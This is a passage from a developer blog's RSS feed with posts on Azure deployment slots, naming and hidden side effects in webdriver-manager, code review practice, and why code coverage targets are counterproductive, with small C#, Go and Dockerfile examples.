class="kg-image" alt="Understanding Azure Deployment Slots"></figure><h2 id="so-what-exactly-are-azure-deployment-slots">So what exactly are Azure Deployment Slots?</h2><p>Let's assume we have a web app running on Azure App Services. We'll call it <em>http://site.com. </em>When you create a new web application, Azure creates a deployment slot for you, typically called <em>production</em>. However, it's possible to add additional deployment slots. 
</p><p>Put simply,<strong> a deployment slot is another web application</strong>. It has its own URL, it <em>could</em> have its own database, connection strings, etc. It can be configured any way you see fit. But why would you want to have two web applications? The most common reason is so that we can have a place to deploy new features to, rather than going straight to production, which can be a little risky. </p><p>To accomplish this, we would create a deployment slot called <em>staging</em>. The staging slot is where you would deploy all new changes to your application to validate that everything is working before the changes actually go live to your users. Think of it like a test environment. A test environment that's really easy to spin up and manage. Let's create a deployment slot called staging and have it be accessible via <em>http://site-staging.com</em>.</p><h2 id="creating-a-deployment-slot">Creating a Deployment Slot</h2><p>Creating a deployment slot is pretty simple. Open your Azure portal and navigate to your Web App resource. Once there, you should be able to see a menu item labeled <strong>Deployment slots.</strong></p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/image-1.png" class="kg-image" alt="Understanding Azure Deployment Slots"></figure><p>Clicking on the <strong>Add Slot </strong>button opens the space to add a new deployment slot. Here you can specify the name of the slot (I used staging) and whether you want to copy any pre-existing configuration (such as your current production deployment slot). Press <strong>OK </strong>and you're all set!</p><p>When the deployment slot is first created, it is empty. So you'll want to deploy your latest and greatest changes to your staging environment (or just re-deploy your current production version to get something up and running). Deploying to your new slot is really no different than deploying to your production slot. 
Using the same tooling, just select the <em>staging </em>slot, rather than the <em>production </em>slot.</p><p>At this point, we have two instances of our web application running. One is our production instance, supporting all of our production traffic, and the other is a staging environment that we are using for testing the latest and greatest features. When you are satisfied with your tests, you will need to <strong>swap </strong>the staging and production slots so that your users can benefit from your new features.</p><h2 id="swapping-deployment-slots">Swapping Deployment Slots</h2><p>Swapping deployment slots routes traffic from the <em>source </em>slot to the <em>target </em>slot. In our case, we want to swap the staging and production slots. This will route our users to the staging app (where our newest changes are) when they navigate to <em>http://site.com</em>.</p><figure class="kg-image-card kg-width-wide"><img src="https://reese.dev/content/images/2018/11/AzureSwap-1.png" class="kg-image" alt="Understanding Azure Deployment Slots"></figure><p>While that is the easiest way to describe what is happening, there is a lot going on behind the scenes that is useful to know.</p><h2 id="when-swapping-source-and-target-matter">When Swapping... Source and Target Matter</h2><p>When performing a swap, you are presented with a <em>source </em>and a <em>target</em>. This may be a little confusing at first. Why would it matter? A swap is just flipping two things! While the end result will be the same, the key takeaway is that uptime is not guaranteed for the source slot.</p><p>This is because when you perform a swap, this is what is really happening:</p><ul><li>First, the staging slot needs to go through some setting changes. This causes the staging site to restart, which is fine.</li><li>Next, the staging site gets warmed up, by having a request sent to its root path (i.e. 
'/'), and waiting for it to complete.</li><li>Now that the staging site is warm, it gets swapped into production. There is no downtime, since it goes straight from one warm site to another.</li><li>Finally, the site that used to be production (and is now staging) also needs to get some settings applied, causing it to restart. Again, this is fine since it happens to the staging site.</li></ul><p>This process guarantees that your <em>destination </em>slot will always be warm and your users won't experience any downtime when the swap happens. Users may experience performance issues when navigating to the staging environment, but this is acceptable as it's not really a production environment.</p><h2 id="when-swapping-settings-are-swapped-too">When Swapping... Settings Are Swapped Too </h2><p><strong>Spoiler Alert: Not all settings are swapped. </strong>It is important to remember that when performing a swap, the settings of a deployment slot are also swapped... but not all of them. </p><p>Some settings make sense to keep specific to the slot; these are called <em>slot settings</em> and can be configured in the Azure portal.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/image.png" class="kg-image" alt="Understanding Azure Deployment Slots"></figure><p>When a setting has been flagged as a <em>slot setting</em>, it <strong>will not</strong> be applied to the target site. This is useful for settings such as connection strings. Maybe you want to have a dedicated database for your staging environment, so you create a slot setting to hold a connection string that connects to a database specifically set up for your staging environment.</p><p>Some settings <strong>will </strong>be swapped during the swap process. These are the settings that are not marked as a "slot setting" under the <em>Application Settings</em> section. This can be useful for a couple of reasons, one of which could be to introduce a new slot setting. 
</p><p>If at first we apply the setting to staging, perform the swap, and then apply the setting to the staging environment again (the old production app), it's possible to add a new setting without incurring an application restart on the production application.</p><p>The Azure portal even tells you which settings will be applied before you perform the swap operation, as shown below.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/azure_slot_preview.png" class="kg-image" alt="Understanding Azure Deployment Slots"><figcaption>Unfortunately the preview does not list <em>all </em>changes that will be applied to the deployment slot. I learned this the hard way.</figcaption></figure><h2 id="when-swapping-the-code-does-not-move">When Swapping... The Code Does Not Move</h2><p>This was something I wasn't always quite sure about until I dug into it a little more and ran some of my own experiments. When you deploy changes to a deployment slot, that is where the changes will forever reside until you deploy over them. Consider the following scenario:</p><p><strong>Version 1</strong> of your application is deployed to your production deployment slot.</p><p><strong>Version 2</strong> of your application is deployed to your staging deployment slot.</p><p>As we learned previously, each deployment slot is its own web application. When a swap is performed, Azure swaps the virtual IP addresses of the source and destination and applies the appropriate settings. The code stays with its respective web application, so the staging web app effectively becomes the production web app, and the production web app becomes the staging web app.</p><p>Put another way, imagine having two boxes. One box has black licorice in it, labeled "production", and the other box has KitKats inside of it, labeled "staging".</p><p><em>Note: To get this analogy right, you just need to agree that KitKats are the superior candy. 
</em></p><p>Your customers are currently going to the black licorice box, but you realize it's time to give them an upgrade. So you swap the location of the boxes. You also swap the labels on the boxes. This puts the "production" label on the KitKat box and the "staging" label on the black licorice box. Directing your customers to the box of delicious KitKats. They obviously rejoice. </p><p>Admittedly, it's sort of a silly example, but I hope it clears up the fact that when you perform a swap, we aren't picking up what's inside the box and moving it to a different box. We're simply relabeling the boxes themselves.</p><h2 id="rolling-back-changes">Rolling Back Changes</h2><p>If the ability to test your changes before going live isn't enough of an incentive to begin leveraging deployment slots, the ability to roll back your changes at the press of a button should be enough to convince you.</p><p>After performing a swap, our users are now hitting the latest version of our application. If for some reason we missed something and we start noticing errors, all we have to do is swap again to put the system back into its previous state.</p><p>There's no need to open up Git, revert the commit, and re-deploy the change. We don't need to deploy anything at all! It's just a matter of routing our users back to the site that was working for them previously.</p><h2 id="testing-in-production">Testing in Production</h2><p>There's also this nifty little feature that we can leverage called <em>Testing in Production. </em>Testing in Production is essentially Azure's implementation of a <strong>canary test</strong>. If you're unfamiliar with the term, it stems from the mining days when miners would bring a canary down with them into the mine. If the canary died, they'd know something was wrong with the air quality, warning them to leave the mine as soon as possible.</p><p>We do canary testing by routing a small subset of users to our new feature. 
Continuing with the production and staging examples, what we do is take 5% of all traffic to our website and actually have it go to our staging environment, with the remaining 95% continuing to hit our production environment. If we don't notice anything wrong, we can bump the 5% up to 10% or even 20%, until we've reached 100%. This way, if anything goes wrong, we've limited the number of users impacted by a bad change.</p><p>If you're interested in trying this feature out, it is relatively simple to get going. Simply click on the <em>Testing in Production </em>menu item from within your App Service.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/image-3.png" class="kg-image" alt="Understanding Azure Deployment Slots"></figure><p>This will allow you to set the percentage of traffic that you want to see going to your staging slot (5% as shown in the figure) and production slot. That's all there is to it!</p><h2 id="wrapping-up">Wrapping Up</h2><p>Deployment slots are incredibly easy to use and offer a wide range of features that make them hard to pass up. If you're hosting your application in Azure, definitely consider them for your current and/or next project!</p><p></p><p></p>]]></content:encoded></item><item><title><![CDATA[The Importance of Naming]]></title><description><![CDATA[<figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/Strip-Trouver-le-nom-de-variable-english650-final.jpg" class="kg-image"><figcaption>A story all too real...</figcaption></figure><p>We've all seen the joke, time and time again --</p><blockquote><em>"There are only two hard things in Computer Science: off by one errors, cache invalidation, and <strong>naming things</strong>."</em></blockquote><p>It's true. Naming things can be really hard. 
There seem to be all of these hidden rules</p>]]></description><link>https://reese.dev/the-importance-of-naming/</link><guid isPermaLink="false">5bf32a007e759204ca2529c2</guid><category><![CDATA[work]]></category><category><![CDATA[devops]]></category><category><![CDATA[coding style]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Tue, 16 Oct 2018 00:03:00 GMT</pubDate><content:encoded><![CDATA[<figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/Strip-Trouver-le-nom-de-variable-english650-final.jpg" class="kg-image"><figcaption>A story all too real...</figcaption></figure><p>We've all seen the joke, time and time again --</p><blockquote><em>"There are only two hard things in Computer Science: off by one errors, cache invalidation, and <strong>naming things</strong>."</em></blockquote><p>It's true. Naming things can be really hard. There seem to be all of these hidden rules around how we can name our properties and classes.</p><blockquote><strong>You:</strong> I'm just going to introduce this helper class, FileHelper.cs</blockquote><blockquote><strong>The World:</strong> No! You can't use <em>Helper </em>in your class! That's just begging to violate the single responsibility principle.</blockquote><p>But naming things correctly can save you and others a lot of time. I'll share with you an example from earlier this week. Consider this command:</p><p><strong>webdriver-manager start</strong></p><p>Assuming you had no knowledge of what this command did, I bet you have some guesses. Maybe you would have only one guess, and I'd honestly be okay with that. You're probably thinking:</p><blockquote>Well... it starts the web driver manager...?</blockquote><p>And you'd be right. Almost.</p><p>Unfortunately, webdriver-manager start <strong>also performs an update. 
</strong>Although the only way you'd be able to figure this out is if you read the <a href="https://github.com/angular/webdriver-manager/blob/master/docs/versions.md#start-command-setting-specific-versions">documentation</a> (which honestly seems a little buried to me) or if you ran into the same issue I ran into this week.</p><p><em>While not incredibly relevant to the story, if you want to learn more about what webdriver-manager is, you can read the project's <a href="https://www.npmjs.com/package/webdriver-manager">npm page</a> or the <a href="https://github.com/angular/webdriver-manager">GitHub repository</a>. The TL;DR is that it is a means to manage E2E tests for Angular projects.</em></p><h3 id="it-goes-a-little-something-like-this-">It goes a little something like this...</h3><p>For most of the things we develop at my company, we put them into Docker containers. This includes our end-to-end (E2E) tests. The Dockerfile for our tests is pretty straightforward, and so as not to add too many unnecessary details, the only thing that really matters is that we have the following command in the Dockerfile:</p><p><strong>RUN webdriver-manager update</strong></p><p>When the image is built, <em>webdriver-manager update </em>will be run, which will download the latest versions of the binaries that webdriver-manager manages (such as the Selenium standalone server). Docker images are immutable. That is, when they are created, they do not change. 
This means that the Docker image will be created with whatever the latest version was at build time.</p><p>Now, to start the webdriver manager, we need to run the infamous <em>webdriver-manager start </em>command from within the Docker container.</p><p>Though depending on when you created your Docker image and when you started running your container, you're going to get one of two scenarios:</p><ol><li>The container will start up just fine and run your tests as you expect.</li><li>The container will error when trying to run the webdriver-manager.</li></ol><p>This is due to the fact that, unfortunately, <em>webdriver-manager start </em>not only starts, but attempts to start the <strong>latest</strong> version. Regardless of what version is installed. So it is possible that a new version has been released, and the Docker image is no longer relevant.</p><p>Luckily the solution isn't too bad. We just need to update the Dockerfile to update to a specific version. This forces our Docker image to always have version 3.0.0 installed.</p><p><strong>RUN webdriver-manager update --versions.standalone 3.0.0</strong></p><p>We then need to change the webdriver-manager start command to also include the same parameter:</p><p><strong>webdriver-manager start --versions.standalone 3.0.0</strong></p><p>Which, in turn, forces the webdriver manager to start a specific version.</p><p>A simple solution, but a problem that took a decent amount of time to figure out. Never would I have imagined that <strong>start </strong>did more than just that. Had the command been called <em>startupdate </em>or just left as <em>start </em>with an optional update parameter, the problem would've been much more apparent.</p><p>The biggest takeaway from all of this is that your naming should say exactly what it is doing and...</p><h3 id="have-no-side-effects">Have no side effects</h3><blockquote>Side effects are lies. Your function promises to do one thing, but it also does other hidden things. 
Sometimes it will have unexpected behavior. They are devious and damaging mistruths that often result in strange temporal couplings and order dependencies. – <strong>Robert C. Martin, <em>Clean Code</em></strong></blockquote><p>Your code should do what it says it does, and nothing more.</p>]]></content:encoded></item><item><title><![CDATA[Conducting a Good Code Review]]></title><description><![CDATA[<figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/codrev.png" class="kg-image"></figure><p>As developers, we perform a lot of code reviews (or at least we should). They are a great way to not only ensure that the code we intend to deploy to production won't have a negative impact on the system, but also a time to learn and better ourselves.</p>]]></description><link>https://reese.dev/conducting-a-good-code-review/</link><guid isPermaLink="false">5bf70b6104e4b332a4385dc5</guid><category><![CDATA[opinion]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Fri, 14 Sep 2018 20:11:00 GMT</pubDate><content:encoded><![CDATA[<figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/codrev.png" class="kg-image"></figure><p>As developers, we perform a lot of code reviews (or at least we should). They are a great way to not only ensure that the code we intend to deploy to production won't have a negative impact on the system, but also a time to learn and better ourselves.</p><p>Unfortunately, I have noticed a trend, especially at work. <strong>We tend to spend the majority of our cycles verifying whether or not the code conforms to standards</strong>. In other words, our first instinct is to scan the code for incorrectly placed braces, improperly named variables, etc. 
rather than reviewing the actual quality of the code.</p><p>There are a lot of great resources available out there on this subject, so I don't want to regurgitate what's already been published, but I did want to highlight a couple of points that <a href="http://www.dotnetcurry.com/software-gardening/1351/types-of-code-review-benefits">this</a> article speaks to.</p><p><strong>What a code review is:</strong></p><ul><li>An opportunity to highlight what is being done well. Reaffirm that the developer is taking the correct approach to solving the problem.</li><li>An opportunity to highlight what can be done better. Offer different solutions and approaches and use it as a chance to improve one's skill set.</li></ul><p><strong>What a code review is not:</strong></p><ul><li>A witch hunt, a time to point out every little fault. Code reviews are a great opportunity to learn. Developers should be eager to have their code reviewed, not shy away from it for fear of belittlement (even if unintended).</li></ul><p><strong>How to conduct a code review:</strong></p><p>First and foremost, understand the subject matter. Really familiarize yourself with the problem that the reviewee is trying to solve. Go to the developer's office and immerse yourself in the problem. You can't offer solution suggestions if you don't even know what the problem is.</p><p>Focus on <em>how</em> the problem was solved, not how it's formatted. Think big picture. Is the change the right approach to solve the problem in the grand scheme of things?</p><p>Code reviews that just point out every little standard violation aren't beneficial to anyone. Use code reviews as an opportunity to share knowledge and encourage learning, not as a platform to demonstrate how well you can enforce formatting guidelines.</p><p>I would also encourage you to seek out reviews from other developers, especially if you're even the slightest bit unsure whether your solution makes sense. 
Just because you have deploy permission doesn't mean you're stuck in a silo. Go forth and get a second opinion.</p><p>If you're looking for additional information, here's a blog series that I completely agree with:</p><ul><li><a href="https://mtlynch.io/human-code-reviews-1/">How to Do Code Reviews Like a Human (Part One)</a></li><li><a href="https://mtlynch.io/human-code-reviews-2/">How to Do Code Reviews Like a Human (Part Two)</a></li></ul>]]></content:encoded></item><item><title><![CDATA[Code Coverage is Useless]]></title><description><![CDATA[<p>Not too long ago there were talks around the office regarding a new testing initiative. Now, by itself, this is fantastic news. Who wouldn't want to actually spend some time and get our testing story up to par?</p><p>The problem lies within the approach that was proposed, going so far</p>]]></description><link>https://reese.dev/code-coverage-is-useless/</link><guid isPermaLink="false">5bdbb3bb7e759204ca2529a4</guid><category><![CDATA[testing]]></category><category><![CDATA[coverage]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Thu, 19 Jul 2018 02:17:00 GMT</pubDate><content:encoded><![CDATA[<p>Not too long ago there were talks around the office regarding a new testing initiative. Now, by itself, this is fantastic news. Who wouldn't want to actually spend some time and get our testing story up to par?</p><p>The problem lies within the approach that was proposed, going so far as to say: <strong>"We need to ensure that we have at least 80% test coverage."</strong></p><p>While the intention is a good one, code coverage is unfortunately useless.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/cotton.jpg" class="kg-image"></figure><p>Now, that <em>is</em> a pretty bold statement, so let me clarify a little bit. Code coverage <strong>goals</strong> are useless. 
You shouldn't strive for X% coverage on a given codebase. There are a few reasons for this, so let me explain.</p><h3 id="it-is-possible-to-test-enough">It is possible to test <em>enough</em></h3><p>Not all codebases are created equal. One could be for an application that sees millions of hits in a day and is grossly complicated. Another could be for a tiny application that services a couple of users a day, if that. I always like to envision these different kinds of applications on a <em>risk plane.</em></p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/risk_plane.png" class="kg-image"><figcaption>.. yeah I still know my way around MS Paint</figcaption></figure><p>Imagine, if you will, that each dot is an application in our system. The further top-right we go, the more likely that if something were to go wrong it'd be some bad news bears. Whereas the further bottom-left... eh? Maybe someone would notice.</p><p>Now, it would be silly to say that every application should have at least 80% code coverage. Why? <strong>Opportunity cost</strong>. While I am a huge proponent of testing, I don't like to test <em>just because</em>. We should aim to test <em>enough</em>. Test enough so that we have enough <em>confidence</em> that our application will function as we expect it to.</p><p>In reality, maybe for our applications in the top right, 80% isn't enough. Maybe that should actually be higher, and we should not stop at 80%. On the flip side, our smaller applications in the bottom left probably don't need such a high coverage percentage. The cycles spent adding tests would potentially bring us little to no value and end up just being a waste of time.</p><blockquote><em><sub><strong>Note:</strong> I feel like at this point some individuals may be a little confused as to how adding tests could bring so little value. 
There's a whole development methodology called TDD that creates a high level of coverage just by following the red, green, refactor cycle. The points I make here generally refer to going back and adding tests because someone dictated that the codebase's coverage percentage was too low. If you're doing TDD to begin with, then setting a target really won't help; high coverage is just a byproduct.</sub></em></blockquote><p>It's all about context. We can't generalize a coverage percentage across codebases, because each codebase is different.</p><p><strong>Fun Fact:</strong> Did you know this sort of risk plane chart can be applicable to many different scenarios? Ever wondered what the risk plane for the security guy looks like?</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/security_risk_plane.png" class="kg-image"></figure><p>Anyway...</p><p>In the same vein, not everything needs a test around it. Let's say we wanted to introduce a new public member into our codebase, something simple:</p><pre><code class="language-csharp">public string FirstName { get; set; } 
</code></pre>
<p>Introducing this line of code, if it is not called in any of our tests, will <em>drop</em> code coverage. Maybe even below our beloved 80%. The fix?</p><pre><code class="language-csharp">[Fact]
public void FirstName_ByDefault_CanBeSet()  
{
  var myClass = new MyClass();
  myClass.FirstName = &quot;testname&quot;;
  Assert.Equal(&quot;testname&quot;, myClass.FirstName);
}
</code></pre>
<p>At this point, we're just testing .NET -- something we definitely want to avoid. I tend to only put tests around code that I know could actually change in a way that I do not want it to. <em>Logical</em> code.</p><h3 id="code-coverage-is-easy">Code coverage is <em>easy</em></h3><p>Just because we have a lot of code coverage does not necessarily mean that we can have a lot of confidence that our application works as we expect it to. Everything is always clearer with examples, so let's consider the following:</p><pre><code class="language-csharp">public class Flawless  
{
  public bool IsGuarenteedToWork()
  {
    // some code
  }
}
</code></pre>
<p>Now, methods usually have logic that we would normally want to test, right? Conditionals, mathematical operations, you name it. Though, for our example, it doesn't matter! We just want to increase code coverage. That's our goal.</p><pre><code class="language-csharp">[Fact]
public void IsGuarenteedToWork_ByDefault_Works()  
{
  var flawless = new Flawless();

  var actual = flawless.IsGuarenteedToWork();
}
</code></pre>
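<p>This kind of gaming isn't specific to .NET or xUnit, either. As a quick sketch, here's the Go equivalent (the names are mine, for illustration): a test function that merely calls the code under test marks its lines as covered under <code>go test -cover</code>, and <code>go test</code> reports the test as passing, since a Go test only fails if it calls <code>t.Error</code> or <code>t.Fatal</code>.</p><pre><code class="language-go">package flawless

import "testing"

// IsGuaranteedToWork mirrors the C# example; imagine real logic here.
func IsGuaranteedToWork() bool {
	return true
}

// This test executes the function, so every line counts as covered,
// but it asserts nothing -- go test reports it as passing regardless.
func TestIsGuaranteedToWork(t *testing.T) {
	_ = IsGuaranteedToWork()
}
</code></pre><p>Coverage tools count execution, not verification, which is exactly why the number alone can't be trusted.</p>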
<p>And there you have it! 100% code coverage. By default, tests that do not have an <code>Assert</code> will be considered passing. Now you're probably thinking.. oh come on, who would actually do this?</p><p><strong>People do silly things when incentivized</strong>. My go-to example is a scenario in which a company tells QA that for every bug they find, they will be given a bonus at the end of the quarter. Seems pretty reasonable, right? The flip side of that is the same company tells development that they will receive a bonus based on how few bugs they introduce into the system.</p><p>This scenario incentivizes the failure of opposing groups. The development organization doesn't really want to write any code for fear of introducing a bug <em>and</em> wants QA to miss bugs in their analysis. Whereas the QA group <em>wants</em> development to introduce bugs into the system so that they can find them and be rewarded for doing so.</p><p>The other thing that we need to keep in mind is that...</p><h3 id="code-coverage-context-matters">Code coverage context <em>matters</em></h3><p>Let's consider that our developer wasn't just trying to game the system, and actually put forth an honest effort toward attaining his code coverage goal. Our implementation could be something like the following:</p><pre><code class="language-csharp">public class Flawless  
{
  public bool IsGuarenteedToWork()
  {
    for(var x = 0; x &lt; int.MaxValue; x++) 
    {
      // Man, this is gonna work. I'll find that solution.. eventually.
    }
    return true; // we do get there.. eventually
  }
}
</code></pre>
<p>.. and let's not forget the test.</p><pre><code class="language-csharp">[Fact]
public void IsGuarenteedToWork_ByDefault_Works()  
{
  var flawless = new Flawless();

  var actual = flawless.IsGuarenteedToWork();

  Assert.True(actual);
}
</code></pre>
<p>I hope it was obvious that the example above is far from performant. But in this case, we've reached 100% code coverage and we're actually asserting that the code is working as we intend it to. The implementation works. The test is correct. Everyone is happy. Almost...</p><p>When it comes to testing, there are different <em>stakeholders</em>.</p><blockquote><em>Stakeholders are people whose lives you touch - Mark McNeil</em></blockquote><p>This can be broken down further into the types of stakeholders.</p><ol><li>Primary Stakeholder (who I'm doing it for) <sub>Example: The customer who requested the feature.</sub></li><li>Secondary Stakeholder (others who are directly involved) <sub>Example: Your boss and/or other developers on the project.</sub></li><li>Indirect Stakeholder (those who are impacted otherwise) <sub>Example: The customers of your customer.</sub></li></ol><p>As programmers, we are writing code to solve problems for other people (sometimes ourselves, if we can find the time). The same section of code matters differently to different people. Person A <em>only</em> cares that the answer is correct. Maybe they're notified when it's ready, but they're pretty indifferent to when they receive it. Person B <em>needs</em> the answer soon after requesting it. Our test only completely satisfies Person A.</p><p>There can be a lot of stakeholders when it comes to writing code. Unfortunately, we can't say with confidence, even at 100% code coverage, that our code is going to be compatible with everyone's needs.</p><p>After all of this harping on why code coverage is useless as a <strong>target</strong>, I need to wrap up by saying...</p><h3 id="code-coverage-can-actually-be-useful">Code coverage can actually be <em>useful</em></h3><p>I prefer to leverage code coverage as a <strong>metric</strong>. 
Coverage is something that we're aware of, something that we can use to make informed decisions about each codebase.</p><p>If we notice that one codebase is consistently dropping in coverage, we can take that as a sign to look a little deeper into what's going on. Is the codebase incredibly hard to test? Are the developers just not putting forth the effort to test, even when it makes sense? Maybe it's actually what we would expect from that codebase, so everything is gravy.</p><p>Coverage can also just let us know whether we're doing an adequate amount of testing. If a mission-critical application only has 10% coverage, we should investigate the reasons for that and potentially start a quality initiative to get some tests strapped on. It allows us to prioritize our testing initiatives without just randomly picking a codebase and throwing tests at it.</p><p>The entire point of all of this is that setting coverage targets will just be counterproductive to your goals. We should be aware of coverage so that we can make informed decisions, but not let it impact the quality of our code just for the sake of coverage attainment.</p>]]></content:encoded></item></channel></rss>